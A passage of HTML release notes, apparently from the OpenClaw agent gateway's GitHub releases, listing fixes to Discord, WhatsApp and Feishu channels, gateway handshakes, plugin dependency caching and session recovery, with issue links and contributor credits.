data-hovercard-type="user" data-hovercard-url="/users/poolside-ventures/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/poolside-ventures">@poolside-ventures</a>.</li>
<li>Chat commands: route sensitive group <code>/diagnostics</code> and <code>/export-trajectory</code> approvals and results to a private owner route, preferring same-surface DMs before falling back to the first configured owner route, so Discord group invocations can land in Telegram when that is the primary owner interface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/hooks: keep successful <code>deliver:false</code> agent hooks silent, log a hook audit record for suppressed success announcements, and suppress fallback summaries after attempted hook delivery while still surfacing failed hook runs. Repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4151948578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55761/hovercard" href="https://github.com/openclaw/openclaw/pull/55761">#55761</a>; builds on <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028886435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/36332/hovercard" href="https://github.com/openclaw/openclaw/pull/36332">#36332</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091099015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49234" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49234/hovercard" href="https://github.com/openclaw/openclaw/pull/49234">#49234</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EffortlessSteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EffortlessSteven">@EffortlessSteven</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cioclawcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cioclawcode">@cioclawcode</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrennerSpear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrennerSpear">@BrennerSpear</a>.</li>
<li>Plugin SDK/Discord: restore a deprecated <code>openclaw/plugin-sdk/discord</code> compatibility facade and the legacy compat group-policy warning export for the published <code>@openclaw/discord@2026.3.13</code> package, covering its config, account, directory, status, and thread-binding imports while keeping new plugins on generic SDK subpaths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344804450" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73685/hovercard" href="https://github.com/openclaw/openclaw/issues/73685">#73685</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345028871" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73703/hovercard" href="https://github.com/openclaw/openclaw/pull/73703">#73703</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rderickson9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rderickson9">@rderickson9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Discord: suppress duplicate gateway monitors when multiple enabled accounts resolve to the same bot token, preferring config tokens over default env fallback and reporting skipped duplicates as disabled. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344054955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73608" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73608/hovercard" href="https://github.com/openclaw/openclaw/pull/73608">#73608</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>CLI/health: build channel health summaries from inspected credential metadata plus runtime state, so <code>openclaw health --json</code> reports Discord <code>running</code>, <code>connected</code>, and <code>tokenSource</code> consistently with channel status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066903951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44354" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44354/hovercard" href="https://github.com/openclaw/openclaw/issues/44354">#44354</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ferenc-acs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ferenc-acs">@ferenc-acs</a>.</li>
<li>Control UI/Talk: decode Google Live binary WebSocket JSON frames and stop queued browser audio on interruption or shutdown, so browser Talk leaves <code>Connecting Talk...</code> and barge-in no longer plays stale audio. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342101919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73460/hovercard" href="https://github.com/openclaw/openclaw/issues/73460">#73460</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342138204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73466/hovercard" href="https://github.com/openclaw/openclaw/pull/73466">#73466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>.</li>
<li>Channels/Discord: ignore stale route-shaped conversation bindings after a Discord channel is reconfigured to another agent, while preserving explicit focus and subagent bindings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344233247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73626/hovercard" href="https://github.com/openclaw/openclaw/issues/73626">#73626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ramitrkar-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ramitrkar-hash">@ramitrkar-hash</a>.</li>
<li>Agents/bootstrap: pass pending BOOTSTRAP.md contents through the first-run user prompt while keeping them out of privileged system context, and show limited bootstrap guidance when workspace file access is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mark1010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mark1010">@mark1010</a>.</li>
<li>ACP/tasks: classify parent-owned ACP sessions as background work regardless of persistent runtime mode, and close terminal stale ACP sessions when no active binding remains, so delegated ACP output reports through the parent task notifier instead of acting like a normal foreground chat session. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Tasks: keep terminal mirrored TaskFlow timestamps pinned to task completion time and let maintenance repair stale mirrors, so ACP terminal delivery updates no longer leave inconsistent flow audits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Gateway/sessions: add conservative stuck-session recovery that releases only stale session lanes while active embedded runs, reply operations, and lane tasks remain serialized, so queued follow-ups can drain without aborting legitimate long-running turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343463353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73581/hovercard" href="https://github.com/openclaw/openclaw/issues/73581">#73581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344463460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73655/hovercard" href="https://github.com/openclaw/openclaw/issues/73655">#73655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WS-Q0758/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WS-Q0758">@WS-Q0758</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryangauvin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryangauvin">@bryangauvin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Plugins: cache unchanged plugin manifest loads by file signature, reducing repeated JSON/JSON5 parsing and manifest normalization in bursty startup and runtime registry paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344765997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73678/hovercard" href="https://github.com/openclaw/openclaw/pull/73678">#73678</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheDutchRuler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheDutchRuler">@TheDutchRuler</a>.</li>
<li>Plugins/runtime-deps: cache unchanged bundled runtime mirror dist-file materialization decisions and close file-lock handles on owner-write failures, reducing repeated startup chunk scans and avoiding FileHandle-GC recovery stalls. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Plugins/runtime-deps: retry and defer transient cleanup failures for owned runtime staging directories so CLI startup no longer aborts after a successful bundled dependency swap. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347196394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73903" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73903/hovercard" href="https://github.com/openclaw/openclaw/issues/73903">#73903</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobfreeman1989/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobfreeman1989">@bobfreeman1989</a>.</li>
<li>Plugins/runtime-deps: cache bundled runtime-deps JSON/package files by file signature, reducing repeated staged-runtime metadata reads during bundled channel startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>.</li>
<li>Plugins/runtime-deps: delegate bundled plugin dependency staging to complete npm/pnpm install plans with durable runtime state, removing retained-manifest and source-checkout cache reconciliation from Gateway startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>.</li>
<li>Plugins/runtime-deps: replace Gateway-start root chunk dependency inference with explicit mirrored-root dependency metadata, reducing staged runtime scans while preserving lazy per-plugin installs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Plugins/runtime-deps: run pnpm staged installs outside the repository workspace and disable pnpm release-age gates for exact bundled runtime dependency materialization, so bundled plugin dependency repair writes packages into the generated stage without blocking fresh packaged dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>CLI/TUI: keep <code>chat.history</code> off model-catalog discovery so initial Gateway-backed TUI history loads cannot block behind slow provider/plugin model scans on low-core hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342748182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73524" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73524/hovercard" href="https://github.com/openclaw/openclaw/issues/73524">#73524</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harshcatsystems-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/harshcatsystems-collab">@harshcatsystems-collab</a>.</li>
<li>Channels/WhatsApp: flag recently reconnected linked accounts in channel status even when the socket is currently healthy, so flapping WhatsApp Web sessions no longer look clean after a brief reconnect. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>.</li>
<li>Channels/WhatsApp: log shared dispatcher delivery failures with reply kind, message id, chat id, and connection id, so typing-without-send reports can identify whether the WhatsApp send path rejected a generated reply. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349593113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74269" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74269/hovercard" href="https://github.com/openclaw/openclaw/issues/74269">#74269</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomcosta-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomcosta-git">@tomcosta-git</a>.</li>
<li>Feishu: suppress distinct late <code>final</code> text deliveries after a streaming card has already closed, while keeping media attachments deliverable, so late-finals no longer reopen duplicate Feishu cards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330083943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71977" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71977/hovercard" href="https://github.com/openclaw/openclaw/issues/71977">#71977</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331519751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72294" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72294/hovercard" href="https://github.com/openclaw/openclaw/pull/72294">#72294</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a>.</li>
<li>Gateway: expose <code>gateway.handshakeTimeoutMs</code> in config, schema, and docs while preserving <code>OPENCLAW_HANDSHAKE_TIMEOUT_MS</code> precedence, so loaded or low-powered hosts can tune local WebSocket pre-auth handshakes without patching dist files. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110188380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51282" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51282/hovercard" href="https://github.com/openclaw/openclaw/pull/51282">#51282</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henry-the-frog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henry-the-frog">@henry-the-frog</a>.</li>
<li>Gateway/TUI/status: align configured and env-based WebSocket handshake budgets across local clients, probes, and fallback RPCs while preserving explicit status timeouts and paired-device auth fallback, so slow local gateways are not marked unreachable by a shorter client watchdog. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342748182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73524" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73524/hovercard" href="https://github.com/openclaw/openclaw/issues/73524">#73524</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342797952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73535" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73535/hovercard" href="https://github.com/openclaw/openclaw/issues/73535">#73535</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harshcatsystems-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/harshcatsystems-collab">@harshcatsystems-collab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DJBlackhawk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DJBlackhawk">@DJBlackhawk</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>.</li>
<li>Gateway/startup: return retryable <code>UNAVAILABLE</code> during the sidecar startup window and keep CLI/TUI/status clients retrying inside their existing timeout budget, so early connects no longer surface as terminal handshake failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>.</li>
<li>Gateway/proxy: bypass inherited proxy environment for local Gateway control-plane WebSockets to <code>localhost</code> as well as loopback IPs, so Windows/WSL proxy settings cannot intercept local CLI/TUI Gateway connections. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342188777" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73474" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73474/hovercard" href="https://github.com/openclaw/openclaw/pull/73474">#73474</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Doctor/Gateway: use a lightweight <code>status</code> RPC without channel summary work for doctor Gateway liveness, so slow health snapshots do not falsely drive service restart repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240455463" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64400/hovercard" href="https://github.com/openclaw/openclaw/issues/64400">#64400</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241956746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64511" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64511/hovercard" href="https://github.com/openclaw/openclaw/pull/64511">#64511</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CHE10X/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CHE10X">@CHE10X</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EronFan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EronFan">@EronFan</a>.</li>
